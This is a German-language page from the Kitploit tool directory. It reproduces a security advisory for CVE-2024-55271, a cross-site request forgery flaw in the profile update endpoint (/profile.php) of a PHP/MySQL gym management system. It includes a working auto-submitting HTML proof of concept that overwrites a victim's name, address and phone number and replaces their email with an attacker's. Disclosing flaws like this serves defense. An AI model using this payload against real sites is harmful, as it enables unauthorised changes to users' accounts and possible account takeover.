Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-55271 — GYM-Managementsystem mit PHP und MYSQL | Kitploit
Tools/GitHubGitHub/shoaibalam112/cve-2024-55271
SchwachstellenanalyseWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

GYM-Managementsystem mit PHP und MYSQL

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Gym Management System ( CVE-2024-55271 )

Ein Gym-Management-System, das mit PHP und MySQL erstellt wurde.

Auditor

Shoaib Alam - LinkedIn-Profil

Beschreibung

CSRF-Schwachstelle im Profilaktualisierungsbereich

Im Gym Management System wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) identifiziert. Dieses Problem tritt in der Profilaktualisierungsfunktion des Benutzerpanels auf.

Die Anwendung verfügt derzeit nicht über die Implementierung von Anti-CSRF-Tokens, was zu einer Anfälligkeit für Cross-Site-Request-Forgery-Angriffe (CSRF) führt. Diese Sicherheitsschwäche betrifft insbesondere den Endpunkt /profile.php. Ein Angreifer kann diese Schwachstelle ausnutzen, um unbefugte Änderungen an sensiblen Benutzerdaten wie Adresse, Name und Telefonnummer vorzunehmen. Dies könnte die Integrität von Benutzerkonten gefährden und zu weiteren Sicherheitsproblemen führen.

Verwundbarer Endpunkt: /profile.php

Proof of Concept (PoC)

Unten finden Sie einen Proof of Concept, der die CSRF-Schwachstelle demonstriert. Dieser PoC wurde mit Burp Suite Professional generiert.

Tool herunterladen
root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>